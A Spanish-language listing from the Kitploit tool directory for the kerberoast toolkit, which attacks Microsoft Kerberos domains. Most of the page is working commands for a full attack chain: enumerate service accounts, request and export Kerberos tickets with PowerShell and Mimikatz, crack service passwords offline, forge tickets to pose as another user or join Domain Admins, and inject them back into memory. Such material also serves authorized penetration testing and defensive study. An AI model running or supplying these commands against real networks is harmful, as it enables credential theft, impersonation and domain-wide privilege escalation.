Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
kerberoast — Kit de herramientas para atacar implementaciones de MS Kerberos: extraer cuentas SPN, solicitar y exportar tickets, descifrar contraseñas de servicios, reescribir tickets para suplantación y escalada de privilegios. | Kitploit
Herramientas/GitHubGitHub/nidem/kerberoast
Ataques de ContraseñasExplotaciónPruebas de PenetraciónAutenticación
GitHubnidem/kerberoast

kerberoast

Kit de herramientas para atacar implementaciones de MS Kerberos: extraer cuentas SPN, solicitar y exportar tickets, descifrar contraseñas de servicios, reescribir tickets para suplantación y escalada de privilegios.

Ver Repositorio
1.5k3127hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

kerberoast

Kerberoast es una serie de herramientas para atacar implementaciones de MS Kerberos. A continuación se presenta una breve descripción de lo que hace cada herramienta.

Extraer todas las cuentas en uso como SPN usando herramientas integradas de MS

root@kitploit:~
PS C:\> setspn -T medin -Q */*

Solicitar Ticket(s)

Un ticket:

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"  

Todos los tickets

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  

Extraer los tickets adquiridos de la memoria RAM con Mimikatz

root@kitploit:~
mimikatz # kerberos::list /export

Descifrar con tgsrepcrack

root@kitploit:~
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Reescribir

Hacer que el usuario parezca un usuario diferente

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500  

Agregar usuario a otro grupo (en este caso Administrador de Dominio)

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512  

Inyectar de nuevo en la RAM con Mimikatz

root@kitploit:~
kerberos::ptt sql.kirbi
Descargar herramienta